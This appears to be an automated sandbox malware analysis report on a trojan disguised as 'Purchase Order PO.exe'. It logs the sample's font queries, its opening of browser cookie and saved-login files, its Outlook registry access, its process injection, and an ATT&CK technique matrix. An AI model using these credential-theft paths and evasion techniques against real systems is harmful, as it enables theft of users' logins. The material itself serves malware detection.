                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\isoburn.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
[Behavior graph, ID 1560968. Sample: Purchase Order PO.exe; Start date: 22/11/2024; Architecture: WINDOWS; Score: 100. Process chain: Purchase Order PO.exe (started) -> Purchase Order PO.exe (started) -> QfgdvbjddZ.exe (injected) -> isoburn.exe (started) -> QfgdvbjddZ.exe (injected) and firefox.exe (started).]

Source | Detection | Scanner | Label | Link
Purchase Order PO.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
Purchase Order PO.exe | 100% | Avira | HEUR/AGEN.1309540 |
Purchase Order PO.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560968
Start date and time: 2024-11-22 15:10:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Purchase Order PO.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@18/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 175
• Number of non-executed functions: 299
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target QfgdvbjddZ.exe, PID 3872 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: Purchase Order PO.exe
Time | Type | Description
09:11:01 | API Interceptor | 1x Sleep call for process: Purchase Order PO.exe modified
09:12:21 | API Interceptor | 9042196x Sleep call for process: isoburn.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          Process:C:\Users\user\Desktop\Purchase Order PO.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1216
                                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                          Malicious:true
                                                                                                                          Reputation:high, very likely benign file
